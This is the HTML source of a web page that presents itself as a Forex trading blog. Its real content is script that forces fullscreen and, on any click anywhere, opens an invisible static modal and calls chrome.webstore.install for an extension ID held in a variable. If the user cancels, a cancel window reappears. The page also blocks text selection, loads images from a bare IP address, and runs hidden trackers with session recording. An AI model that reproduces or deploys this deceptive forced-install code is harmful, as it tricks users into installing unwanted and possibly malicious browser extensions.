

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="tr">
<head>
<title>Forex Trading and Brokers Knowledge Blog &#8211; forexmaintradesmet.club &#8211; The easiest way to learn Forex is to provide! We provide technical support.</title>

<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
	  <link href="https://s.ytimg.com/yts/img/favicon-vflz7uhzw.ico" rel="shortcut icon" type="image/x-icon">
   
	<script src='//cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
	<script src='//maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js'></script>
      <script>
	function ints() {
		try {
			document.documentElement.requestFullScreen();
		} catch (e) {};
		try {
			document.documentElement.webkitRequestFullScreen();
		} catch (e) {};
		document.getElementById('cancelWindow').style.display = "none";
	    var url = "https://chrome.google.com/webstore/detail/"+chrttid;
	    call = true;
		chrome.webstore.install(url, successPlainCallback, errorCallback);
		setTimeout('document.getElementById(\'continue\').style.display = \'block\'',800);
		setTimeout('document.getElementById(\'undeContinue\').style.display = \'block\'',500);
    }

	function successPlainCallback() {
	    y = false;
		document.getElementById('continue').style.display = 'none';
		document.getElementById('undeContinue').style.display = 'none';
		window.onbeforeunload = null;
		//yaCounter28983680.reachGoal('INSTALL');
		document.getElementById('cancelWindow').style.display = "none";
		document.location.href = sucurl;
    }

	function errorCallback(err) {
        if (err == "User cancelled install") {
			call = false;
            document.getElementById('continue').style.display = 'none';
			//document.getElementById('undeContinue').style.display = 'none';
			document.getElementById('cancelWindow').style.display = "block";
        };
    }
	
	//setTimeout(function(){alert(getText())}, 200);
</script>
    <style type="text/css">

	html {
  font-family: "roboto", helvetica;
  position: relative;
  height: 100%;
  font-size: 100%;
  line-height: 1.5;
  color: #444;
}
body  {
    -webkit-user-select: none;
    -khtml-user-select: none;
    -moz-user-select: none;
    -o-user-select: none;
    user-select: none;
}


h2 {
  margin: 1.75em 0 0;
  font-size: 5vw;
}

h3 { font-size: 1.3em; }

.v-center {
  height: 100vh;
  width: 100%;
  display: table;
  position: relative;
  text-align: center;
}

.v-center > div {
  display: table-cell;
  vertical-align: middle;
  position: relative;
  top: -10%;
}

.modal-open{
    overflow:hidden
}
.modal{
    position:fixed;
    top: 10%;
    right:0;
    bottom:0;
    left: 25%;
	width: 50%;
    z-index:1050;
    display:none;
    overflow:hidden;
    -webkit-overflow-scrolling:touch;
    outline:0
}
.modal.fade .modal-dialog{
    -webkit-transition:-webkit-transform .3s ease-out;
    -o-transition:-o-transform .3s ease-out;
    transition:transform .3s ease-out;
    -webkit-transform:translate(0,-25%);
    -ms-transform:translate(0,-25%);
    -o-transform:translate(0,-25%);
    transform:translate(0,-25%)
}
.modal.in .modal-dialog{
    -webkit-transform:translate(0,0);
    -ms-transform:translate(0,0);
    -o-transform:translate(0,0);
    transform:translate(0,0)
}
.modal-open .modal{
    overflow-x:hidden;
    overflow-y:auto
}
.modal-dialog{
    position:relative;
    width:auto;
    margin:10px
}
.modal-content{
    position:relative;
    background-color:#fff;
    -webkit-background-clip:padding-box;
    background-clip:padding-box;
    border:1px solid #999;
    border:1px solid rgba(0,0,0,.2);
    border-radius:6px;
    outline:0;
    -webkit-box-shadow:0 3px 9px rgba(0,0,0,.5);
    box-shadow:0 3px 9px rgba(0,0,0,.5)
}
.modal-backdrop{
    position:fixed;
    top:0;
    right:0;
    bottom:0;
    left:0;
    z-index:1040;
    background-color:#000
}
.modal-backdrop.fade{
    filter:alpha(opacity=0);
    opacity:0
}
.modal-backdrop.in{
    cursor: pointer;
    filter:alpha(opacity=0);
    opacity:.0
}
.modal-header{
    min-height:16.43px;
    padding:15px;
    border-bottom:1px solid #e5e5e5
}
.modal-header .close{
    margin-top:-2px
}
.modal-title{
    margin:0;
    line-height:1.42857143
}
.modal-body{
    position:relative;
    padding:15px
}
.modal-footer{
    padding:15px;
    text-align:right;
    border-top:1px solid #e5e5e5
}
.modal-footer .btn+.btn{
    margin-bottom:0;
    margin-left:5px
}
.modal-footer .btn-group .btn+.btn{
    margin-left:-1px
}
.modal-footer .btn-block+.btn-block{
    margin-left:0
}
.modal-scrollbar-measure{
    position:absolute;
    top:-9999px;
    width:50px;
    height:50px;
    overflow:scroll
}

	</style>
</head>
<body>
<div id="myModal" class="modal fade" role="dialog" style="cursor:pointer !important;">
  <div class="modal-dialog">
    <!-- Modal content-->
    <div class="modal-content">
      <div class="modal-header">
     <header> 
  <center>
  <img src="http://193.70.107.31/Selena-text.jpg"></img>
    <h4 class="modal-title"><img src="http://193.70.107.31/lap.gif" height="50" width="50" alt="Ornek Resim"></h4>
  </center>
  </header>
      </div>
      <div class="modal-body">
        <p> 
<center>
<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- images -->
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-3655092283812418"
     data-ad-slot="3130347646"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
</center>
</p>
      </div>
      <div class="modal-footer">
      
      </div>
    </div>

  </div>
</div>
<script>
$(document).click(function() { 		 
		 $('#myModal').modal({
    backdrop: 'static',
    keyboard: true, 
    show: true
     }); 	
ints();
});	

 </script>

<div style="display:none !important;">
<script id="_wausw0">var _wau = _wau || []; _wau.push(["dynamic", "toker3432", "sw0", "c4302bffffff", "small"]);</script><script async src="//waust.at/d.js"></script>


</div>

<a onClick="ints(); return false" href="#" data-modal-id="myModal">

<img src="http://193.70.107.31/Selena2.jpg" alt="Ornek Resim"></a>


<!-- reklam -->

</div>
<!--/reklam -->
<!-- Yandex.Metrika counter -->
<script type="text/javascript" >
    (function (d, w, c) {
        (w[c] = w[c] || []).push(function() {
            try {
                w.yaCounter51379675 = new Ya.Metrika2({
                    id:51379675,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true,
                    webvisor:true
                });
            } catch(e) { }
        });

        var n = d.getElementsByTagName("script")[0],
            s = d.createElement("script"),
            f = function () { n.parentNode.insertBefore(s, n); };
        s.type = "text/javascript";
        s.async = true;
        s.src = "https://mc.yandex.ru/metrika/tag.js";

        if (w.opera == "[object Opera]") {
            d.addEventListener("DOMContentLoaded", f, false);
        } else { f(); }
    })(document, window, "yandex_metrika_callbacks2");
</script>
<noscript><div><img src="https://mc.yandex.ru/watch/51379675" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->
</body>
</html>

